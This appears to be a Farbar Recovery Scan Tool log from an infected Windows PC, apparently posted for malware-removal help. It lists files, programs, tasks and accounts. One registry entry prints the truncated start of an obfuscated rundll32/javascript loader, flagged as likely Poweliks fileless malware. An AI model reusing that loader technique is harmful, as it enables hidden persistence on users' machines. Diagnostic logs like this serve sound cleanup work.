2014-10-16 06:00 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-10-16 06:00 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-16 06:00 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2014-10-16 06:00 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2014-10-16 06:00 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-16 06:00 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-16 06:00 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-16 06:00 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-10-16 06:00 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-10-16 06:00 - 2014-09-18 19:50 - 00108032 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2014-10-16 06:00 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2014-10-16 06:00 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2014-10-16 06:00 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2014-10-16 06:00 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-16 06:00 - 2014-09-18 19:20 - 00677888 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-16 06:00 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-16 06:00 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2014-10-16 06:00 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-16 06:00 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-16 06:00 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2014-10-16 06:00 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-16 05:59 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-16 05:59 - 2014-08-28 20:44 - 02744320 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll
2014-10-16 05:59 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-10-16 05:59 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-10-16 05:59 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys
2014-10-16 05:59 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys
2014-10-16 05:58 - 2014-08-29 20:50 - 05702656 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-10-08 16:48 - 2014-10-24 19:09 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2014-09-30 05:40 - 2014-09-30 05:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-24 19:17 - 2009-07-13 23:34 - 00014240 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-24 19:17 - 2009-07-13 23:34 - 00014240 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-24 19:15 - 2012-08-25 09:04 - 00001844 _____ () C:\Users\Public\Desktop\McAfee Internet Security.lnk
2014-10-24 19:15 - 2010-05-07 22:53 - 01613249 _____ () C:\windows\WindowsUpdate.log
2014-10-24 19:09 - 2009-07-13 23:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-10-24 19:09 - 2009-07-13 23:39 - 00333667 _____ () C:\windows\setupact.log
2014-10-24 18:40 - 2010-05-07 23:24 - 00720546 _____ () C:\windows\PFRO.log
2014-10-23 22:17 - 2010-08-14 11:20 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Skype
2014-10-23 20:13 - 2010-08-13 15:58 - 00000000 ____D () C:\Users\Jude\AppData\Local\VirtualStore
2014-10-23 20:02 - 2014-07-05 15:34 - 00000000 ____D () C:\windows\Minidump
2014-10-22 23:19 - 2011-06-06 11:12 - 00000000 ____D () C:\Users\Jude\AppData\Local\{D76B0B32-AE89-4965-A220-20340E32DB46}
2014-10-22 23:18 - 2013-08-03 08:13 - 00701104 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerApp.exe
2014-10-22 23:18 - 2011-07-30 12:21 - 00071344 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerCPLApp.cpl
2014-10-22 23:17 - 2010-08-29 13:04 - 00000000 ____D () C:\Users\Jude\AppData\Local\Adobe
2014-10-22 23:08 - 2011-07-30 12:19 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-10-22 23:07 - 2010-08-29 13:05 - 00000000 ____D () C:\ProgramData\Adobe
2014-10-20 20:17 - 2014-07-05 15:34 - 347985863 _____ () C:\windows\MEMORY.DMP
2014-10-20 18:56 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\rescache
2014-10-19 09:35 - 2010-08-29 13:23 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Malwarebytes
2014-10-19 09:34 - 2010-08-29 13:23 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-16 16:07 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\Microsoft.NET
2014-10-16 09:16 - 2009-07-13 23:33 - 00408160 _____ () C:\windows\system32\FNTCACHE.DAT
2014-10-16 09:08 - 2013-08-03 08:26 - 00000000 ____D () C:\windows\system32\MRT
2014-10-16 09:01 - 2010-12-25 17:37 - 100290944 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-16 07:59 - 2011-09-01 13:39 - 00000000 ____D () C:\Users\Jude\AppData\Local\{1E67DC0C-F6E5-45C4-8408-EB5E04C72A6E}
2014-10-06 11:15 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\system32\NDF
2014-10-01 11:11 - 2013-11-30 09:46 - 00023256 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
2014-09-29 07:47 - 2009-07-13 23:53 - 00032632 _____ () C:\windows\Tasks\SCHEDLGU.TXT

Files to move or delete:
====================
C:\ProgramData\flashax10.exe
C:\Users\Jude\gotomypc_540.exe


Some content of TEMP:
====================
C:\Users\Jude\AppData\Local\Temp\catchme.dll
C:\Users\Jude\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Jude\AppData\Local\Temp\ezGameXN.dll
C:\Users\Jude\AppData\Local\Temp\GameXNGO.exe
C:\Users\Jude\AppData\Local\Temp\MSN407.exe
C:\Users\Jude\AppData\Local\Temp\nss6D16.tmp.exe
C:\Users\Jude\AppData\Local\Temp\Quarantine.exe
C:\Users\Jude\AppData\Local\Temp\Refresh.exe
C:\Users\Jude\AppData\Local\Temp\SHSetup.exe
C:\Users\Jude\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Jude\AppData\Local\Temp\sqlite3.dll
C:\Users\Jude\AppData\Local\Temp\sqlite3.exe
C:\Users\Jude\AppData\Local\Temp\vxocslb.dll
C:\Users\Jude\AppData\Local\Temp\_is7D79.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-20 18:48

==================== End Of Log ============================

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 23-10-2014
Ran by Jude at 2014-10-24 19:38:17
Running from C:\Users\Jude\Documents
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: McAfee Firewall (Enabled) {959DA8E2-3527-57D1-4915-924367AD4FE9}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
ATI Catalyst Install Manager (HKLM\...\{E5BD6284-4CB5-67B7-0578-F015543030CF}) (Version: 3.0.732.0 - ATI Technologies, Inc.)
Avast Free Antivirus (HKLM\...\Avast) (Version: 10.0.2206 - AVAST Software)
Business Contact Manager for Outlook 2007 SP2 (HKLM\...\Business Contact Manager) (Version: 3.0.8619.1 - Microsoft Corporation)
Business Contact Manager for Outlook 2007 SP2 (Version: 3.0.8619.1 - Microsoft Corporation) Hidden
Canon MX860 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX860_series) (Version:  - )
Catalyst Control Center - Branding (Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (Version: 2009.0710.1127.18698 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2009.0710.1127.18698 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2009.0710.1127.18698 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2009.0710.1127.18698 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2009.0710.1127.18698 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2009.0710.1127.18698 - ATI) Hidden
Catalyst Control Center InstallProxy (Version: 2009.0710.1127.18698 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (Version: 2009.0710.1127.18698 - ATI) Hidden
CCC Help Chinese Standard (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Czech (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Danish (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Dutch (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help English (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Finnish (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help French (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help German (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Greek (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Hungarian (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Italian (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Japanese (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Korean (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Norwegian (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Polish (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Portuguese (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Russian (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Spanish (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Swedish (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Thai (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Turkish (Version: 2009.0710.1126.18698 - ATI) Hidden
ccc-core-static (Version: 2009.0710.1127.18698 - ATI) Hidden
ccc-utility (Version: 2009.0710.1127.18698 - ATI) Hidden
Coupon Printer for Windows (HKLM\...\Coupon Printer for Windows5.0.0.1) (Version: 5.0.0.1 - Coupons.com Incorporated)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
DIBS (Version: 1.7.0 - DDNI) Hidden
EPSON Artisan 730 Series Printer Uninstall (HKLM\...\EPSON Artisan 730 Series) (Version:  - SEIKO EPSON Corporation)
Epson Connect (HKLM\...\{64BA551C-9AF6-495C-93F3-D1270E0045FC}) (Version:  - )
Epson Customer Participation (HKLM\...\{814FA673-A085-403C-9545-747FC1495069}) (Version: 1.0.0.0 - SEIKO EPSON CORPORATION)
Epson Download Navigator (HKLM\...\{10F63395-157F-4B93-AB4D-702A2FF11942}) (Version: 1.0.1 - SEIKO EPSON CORPORATION)
Epson Event Manager (HKLM\...\{8ED43F7E-A8F6-4898-AF11-B6158F2EDF94}) (Version: 2.50.0000 - SEIKO EPSON CORPORATION)
Epson Print CD (HKLM\...\{D16A31F9-276D-4968-A753-FFEAC56995D0}) (Version: 2.05.00 - SEIKO EPSON CORPORATION)
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
ESET Online Scanner v3 (HKLM\...\ESET Online Scanner) (Version:  - )
FanSpeedControl (HKLM\...\InstallShield_{209E3222-E1E4-4244-A2E5-49DCEBEA1A91}) (Version: 1.00.00.13 - Lenovo)
FanSpeedControl (Version: 1.00.00.13 - Lenovo) Hidden
GoToMyPC (HKLM\...\{99327AF8-A8FE-4948-B47E-47982357F470}) (Version: 8.2.1470 - Citrix Online)
Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Java Auto Updater (Version: 2.1.71.14 - Oracle, Inc.) Hidden
Juniper Networks Setup Client (HKCU\...\Juniper_Setup_Client) (Version: 2.2.3.8885 - Juniper Networks)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Driver and Application Installation (HKLM\...\{45970CD1-D599-47D4-938F-3E9800D54ED1}) (Version: 5.1.0.1126 - Lenovo)
Lenovo First Boot (HKLM\...\{F2602F16-02D1-4F1C-99A5-E246C522A59D}) (Version: 1.7.3.5 - DDNI)
Lenovo Healthcare Software (HKLM\...\{9610EC3A-C7A0-4C31-9F3B-F9020C582B47}) (Version: 3.0.0.090928 - Lenovo)
Lenovo Idea Central (HKLM\...\Lenovo Idea Central) (Version: 1.7.3.5 - DDNI)
Lenovo Idea Notes (HKLM\...\{A06E1854-1580-4157-AD70-72734D324DEA}) (Version: 1.5.1 - DDNI)
Lenovo Power2Go (HKLM\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3321a3 - CyberLink Corp.)
Lenovo Power2Go (Version: 6.0.3321a3 - CyberLink Corp.) Hidden
Lenovo Rescue System (HKLM\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 3.0.1029 - CyberLink Corp.)
Lenovo Rescue System (Version: 3.0.1029 - CyberLink Corp.) Hidden
Lenovo Software Instruction (HKLM\...\{A79C1D34-2831-4A5D-91C7-279EF892B5CF}) (Version: 1.0.0.090907 - Lenovo)
LTCM Client (HKLM\...\LTCM Client) (Version:  - Leader Technologies Inc.)
LVT (HKLM\...\{D3063097-EC84-4D21-84A4-9D852E974355}) (Version: 4.1.1.0930 - Lenovo)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
McAfee Internet Security (HKLM\...\MSC) (Version: 12.8.988 - McAfee, Inc.)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM\...\{90A40409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version:  - Microsoft)
Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Office Small Business Connectivity Components (HKLM\...\{A939D341-5A04-4E0A-BB55-3E65B386432D}) (Version: 2.0.7024.0 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.7 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.1.10329.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{7670D32F-DAE6-4E49-8C8B-B3F08B5B1686}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{E7084B89-69E0-46B3-A118-8F99D06988CD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
Realtek 8136 8168 8169 Ethernet Driver (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0006 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5958 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7100.30095 - Realtek Semiconductor Corp.)
Shared C Run-time for x86 (Version: 10.0.0 - McAfee) Hidden
Skype Click to Call (HKLM\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.16 (HKLM\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.16.105 - Skype Technologies S.A.)
SpyHunter (HKLM\...\{455F074C-814E-4520-B69B-5584BD90400C}) (Version: 4.17.6.4336 - Enigma Software Group USA, LLC)
Windows Driver Package - Citrix Systems monblanking Citrix Driver  (04/25/2013 6.2.101.0) (HKLM\...\831FB1509292986F102B3AB7C8451FA1EA13B0F7) (Version: 04/25/2013 6.2.101.0 - Citrix Systems)
Windows Live Communications Platform (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Essentials (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mail (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Messenger (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live UX Platform (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{42481700-CF3C-4D05-8EC6-F9A1C57E8DC0}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{56CBD3CF-BF99-4DF5-851F-F5B9B57496A1}\InprocServer32 -> C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\twain_32.dll (Microsoft)
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File

==================== Restore Points  =========================

24-10-2014 03:14:31 Installed SpyHunter
25-10-2014 00:11:54 Removed Sophos Virus Removal Tool.
25-10-2014 00:18:24 Removed Sophos Virus Removal Tool.
25-10-2014 00:34:16 Removed SpyHunter

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:04 - 2009-06-10 16:39 - 00000824 ____N C:\windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0A914036-CC1B-405D-9101-BFEA6728354F} - System32\Tasks\SpyHunter4Startup => C:\Program Files\Enigma Software Group\SpyHunter\Spyhunter4.exe [2014-01-09] (Enigma Software Group USA, LLC.)
Task: {256D20A3-E260-45B3-A200-6501BA821A09} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2014-10-23] (AVAST Software)
Task: {64896B75-59B2-4E3E-B610-37F91B1CBC7A} - System32\Tasks\{F3447E5C-8F81-4D66-814C-FA6E83C68048} => C:\Program Files\Skype\Phone\Skype.exe [2014-05-08] (Skype Technologies S.A.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Loaded Modules (whitelisted) =============

2014-10-24 18:41 - 2014-10-24 18:41 - 02896896 _____ () C:\Program Files\AVAST Software\Avast\defs\14102401\algo.dll
2014-10-23 20:28 - 2014-10-23 20:28 - 02151544 _____ () C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxVMM.dll
2014-10-23 20:28 - 2014-10-23 20:28 - 00021488 _____ () C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxREM.dll
2014-10-23 20:28 - 2014-10-23 20:28 - 04470080 _____ () C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxRT.dll
2010-05-07 23:02 - 2008-09-27 10:39 - 00045056 _____ () C:\Program Files\Lenovo\HealthCare\HOOK.dll
2010-05-07 23:02 - 2009-09-09 11:25 - 00057344 _____ () C:\Program Files\Lenovo\HealthCare\en-us\en-us.dll
2009-06-03 22:59 - 2009-06-03 22:59 - 00619816 ____N () C:\Program Files\Lenovo\Power2Go\CLMediaLibrary.dll
2009-06-03 22:59 - 2009-06-03 22:59 - 00013096 ____N () C:\Program Files\Lenovo\Power2Go\CLMLSvcPS.dll
2014-10-23 20:28 - 2014-10-23 20:28 - 38561576 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2009-06-19 12:33 - 2009-06-19 12:33 - 00016384 ____R () C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-05-07 22:54 - 2010-05-07 22:54 - 00270336 _____ () C:\windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2014-10-23 20:28 - 2014-10-23 20:28 - 00317632 _____ () C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxDDU.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\Users\Jude\Documents\Grandpa Frank's picture.eml:OECustomProperty

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SophosVirusRemovalTool => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SophosVirusRemovalTool => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-4075801609-534856644-2620926182-500 - Administrator - Disabled)
Guest (S-1-5-21-4075801609-534856644-2620926182-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-4075801609-534856644-2620926182-1006 - Limited - Enabled)
Jude (S-1-5-21-4075801609-534856644-2620926182-1004 - Administrator - Enabled) => C:\Users\Jude

==================== Faulty Device Manager Devices =============

Name: Teredo Tunneling Pseudo-Interface
